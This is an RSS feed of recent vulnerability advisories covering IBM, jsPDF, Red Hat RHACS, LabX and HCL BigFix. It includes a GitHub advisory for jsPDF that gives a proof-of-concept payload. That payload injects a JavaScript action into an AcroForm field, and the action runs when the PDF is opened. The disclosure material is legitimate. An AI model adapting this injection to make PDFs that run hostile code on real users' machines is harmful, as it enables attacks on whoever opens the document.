<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 10:56:39 +0000</lastBuildDate>
    <item>
      <title>bdu:2026-01175</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2026-01175</link>
      <description>bdu:2026-01175</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2026-01175</guid>
    </item>
    <item>
      <title>certfr-2026-avi-0834 — De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquan…</title>
      <link>https://cve.radiocsirt.org/vuln/certfr-2026-avi-0834</link>
      <description>certfr-2026-avi-0834</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/certfr-2026-avi-0834</guid>
    </item>
    <item>
      <title>EUVD-2026-354855</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-354855</link>
      <description>EUVD-2026-354855</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-354855</guid>
    </item>
    <item>
      <title>fkie_cve-2026-24737</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-24737</link>
      <description>&lt;p&gt;jsPDF is a library to generate PDFs in JavaScript. Prior to 4.1.0, user control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions. If given the possibility to pass unsanitized input to one of the following methods or properties, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim opens the document. The vulnerable API members are AcroformChoiceField.addOption, AcroformChoiceField.setOptions, AcroFormCheckBox.appearanceState, and AcroFormRadioButton.appearanceState. The vulnerability has been fixed in jsPDF@4.1.0.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;jsPDF is a library to generate PDFs in JavaScript. Prior to 4.1.0, user control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions. If given the possibility to pass unsanitized input to one of the following methods or properties, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim opens the document. The vulnerable API members are AcroformChoiceField.addOption, AcroformChoiceField.setOptions, AcroFormCheckBox.appearanceState, and AcroFormRadioButton.appearanceState. The vulnerability has been fixed in jsPDF@4.1.0.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-24737</guid>
    </item>
    <item>
      <title>GHSA-pqxr-3g65-p328 — jsPDF has PDF Injection in AcroFormChoiceField that allows Arbitrary JavaScript Execution</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-pqxr-3g65-p328</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: jspdf&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions.&lt;/p&gt;
&lt;p&gt;If given the possibility to pass unsanitized input to one of the following methods or properties, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim opens the document. The vulnerable API members are:&lt;/p&gt;
&lt;p&gt;* `AcroformChoiceField.addOption`
* `AcroformChoiceField.setOptions`
* `AcroFormCheckBox.appearanceState`
* `AcroFormRadioButton.appearanceState`&lt;/p&gt;
&lt;p&gt;Example attack vector:&lt;/p&gt;
&lt;p&gt;```js
import { jsPDF } from &amp;#34;jspdf&amp;#34;
const doc = new jsPDF();&lt;/p&gt;
&lt;p&gt;var choiceField = new doc.AcroFormChoiceField();
choiceField.T = &amp;#34;VulnerableField&amp;#34;;
choiceField.x = 20;
choiceField.y = 20;
choiceField.width = 100;
choiceField.height = 20;&lt;/p&gt;
&lt;p&gt;// PAYLOAD:
// 1. Starts with &amp;#34;/&amp;#34; to bypass escaping.
// 2. &amp;#34;dummy]&amp;#34; closes the array.
// 3. &amp;#34;/AA&amp;#34; injects an Additional Action (Focus event).
// 4. &amp;#34;/JS&amp;#34; executes arbitrary JavaScript.
const payload = &amp;#34;/dummy] /AA &amp;lt;&amp;lt; /Fo &amp;lt;&amp;lt; /S /JavaScript /JS (app.alert(&amp;#39;XSS&amp;#39;)) &amp;gt;&amp;gt; &amp;gt;&amp;gt; /Garbage [&amp;#34;;&lt;/p&gt;
&lt;p&gt;choiceField.addOption(payload);
doc.addField(choiceField);&lt;/p&gt;
&lt;p&gt;doc.save(&amp;#34;test.pdf&amp;#34;);
```&lt;/p&gt;
&lt;p&gt;### Patches&lt;/p&gt;
&lt;p&gt;The vulnerability has been fixed in jsPDF@4.1.0.&lt;/p&gt;
&lt;p&gt;### Workarounds
Sanitize user input before passing it to the vulnerable API members.&lt;/p&gt;
&lt;p&gt;### Credits
Research and fix: Ahmet Artuç&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: jspdf&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions.&lt;/p&gt;
&lt;p&gt;If given the possibility to pass unsanitized input to one of the following methods or properties, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim opens the document. The vulnerable API members are:&lt;/p&gt;
&lt;p&gt;* `AcroformChoiceField.addOption`
* `AcroformChoiceField.setOptions`
* `AcroFormCheckBox.appearanceState`
* `AcroFormRadioButton.appearanceState`&lt;/p&gt;
&lt;p&gt;Example attack vector:&lt;/p&gt;
&lt;p&gt;```js
import { jsPDF } from &amp;#34;jspdf&amp;#34;
const doc = new jsPDF();&lt;/p&gt;
&lt;p&gt;var choiceField = new doc.AcroFormChoiceField();
choiceField.T = &amp;#34;VulnerableField&amp;#34;;
choiceField.x = 20;
choiceField.y = 20;
choiceField.width = 100;
choiceField.height = 20;&lt;/p&gt;
&lt;p&gt;// PAYLOAD:
// 1. Starts with &amp;#34;/&amp;#34; to bypass escaping.
// 2. &amp;#34;dummy]&amp;#34; closes the array.
// 3. &amp;#34;/AA&amp;#34; injects an Additional Action (Focus event).
// 4. &amp;#34;/JS&amp;#34; executes arbitrary JavaScript.
const payload = &amp;#34;/dummy] /AA &amp;lt;&amp;lt; /Fo &amp;lt;&amp;lt; /S /JavaScript /JS (app.alert(&amp;#39;XSS&amp;#39;)) &amp;gt;&amp;gt; &amp;gt;&amp;gt; /Garbage [&amp;#34;;&lt;/p&gt;
&lt;p&gt;choiceField.addOption(payload);
doc.addField(choiceField);&lt;/p&gt;
&lt;p&gt;doc.save(&amp;#34;test.pdf&amp;#34;);
```&lt;/p&gt;
&lt;p&gt;### Patches&lt;/p&gt;
&lt;p&gt;The vulnerability has been fixed in jsPDF@4.1.0.&lt;/p&gt;
&lt;p&gt;### Workarounds
Sanitize user input before passing it to the vulnerable API members.&lt;/p&gt;
&lt;p&gt;### Credits
Research and fix: Ahmet Artuç&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-pqxr-3g65-p328</guid>
    </item>
    <item>
      <title>RHSA-2026:4466 — Red Hat Security Advisory: RHACS 4.8.9 security and bug fix update</title>
      <link>https://cve.radiocsirt.org/vuln/rhsa-2026:4466</link>
      <description>&lt;p&gt;lodash: prototype pollution in _.unset and _.omit functions golang: net/url: Memory exhaustion in query parameter parsing in net/url golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate urllib3: urllib3: Unbounded decompression chain leads to resource exhaustion urllib3: urllib3 Streaming API improperly handles highly compressed data crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption urllib3: urllib3 vulnerable to decompression-bomb safeguard bypass when following HTTP redirects (streaming API) jsPDF: jsPDF: Cross-User Data Leakage via race condition in addJS method jsPDF: jsPDF: Arbitrary code execution via unsanitized input in Acroform module&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;lodash: prototype pollution in _.unset and _.omit functions golang: net/url: Memory exhaustion in query parameter parsing in net/url golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate urllib3: urllib3: Unbounded decompression chain leads to resource exhaustion urllib3: urllib3 Streaming API improperly handles highly compressed data crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption urllib3: urllib3 vulnerable to decompression-bomb safeguard bypass when following HTTP redirects (streaming API) jsPDF: jsPDF: Cross-User Data Leakage via race condition in addJS method jsPDF: jsPDF: Arbitrary code execution via unsanitized input in Acroform module&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/rhsa-2026:4466</guid>
    </item>
    <item>
      <title>VDE-2026-064 — METTLER TOLEDO: LabX Standard Report on External Component Analysis - v21.3</title>
      <link>https://cve.radiocsirt.org/vuln/vde-2026-064</link>
      <description>&lt;p&gt;Multiple vulnerabilities have been discovered in LabX Standard v21.3.22. Most of the vulnerabilities are fixed in LabX Standard v21.4.23. The Vulnerabilities CVE-2025-69419, CVE-2026-0915, CVE-2025-15467 and CVE-2025-58187 are not yet fixed. The fix will be available in the upcoming releases.&lt;/p&gt;
&lt;p&gt;Notice: LabX Standard was formerly known as LabX Cloud Local.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Multiple vulnerabilities have been discovered in LabX Standard v21.3.22. Most of the vulnerabilities are fixed in LabX Standard v21.4.23. The Vulnerabilities CVE-2025-69419, CVE-2026-0915, CVE-2025-15467 and CVE-2025-58187 are not yet fixed. The fix will be available in the upcoming releases.&lt;/p&gt;
&lt;p&gt;Notice: LabX Standard was formerly known as LabX Cloud Local.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/vde-2026-064</guid>
    </item>
    <item>
      <title>WID-SEC-W-2026-0553 — HCL BigFix: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-0553</link>
      <description>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in HCL BigFix ausnutzen, um Informationen offenzulegen, um beliebigen Programmcode auszuführen, um einen Denial of Service Angriff durchzuführen, und um Dateien zu manipulieren.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in HCL BigFix ausnutzen, um Informationen offenzulegen, um beliebigen Programmcode auszuführen, um einen Denial of Service Angriff durchzuführen, und um Dateien zu manipulieren.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2026-0553</guid>
    </item>
  </channel>
</rss>
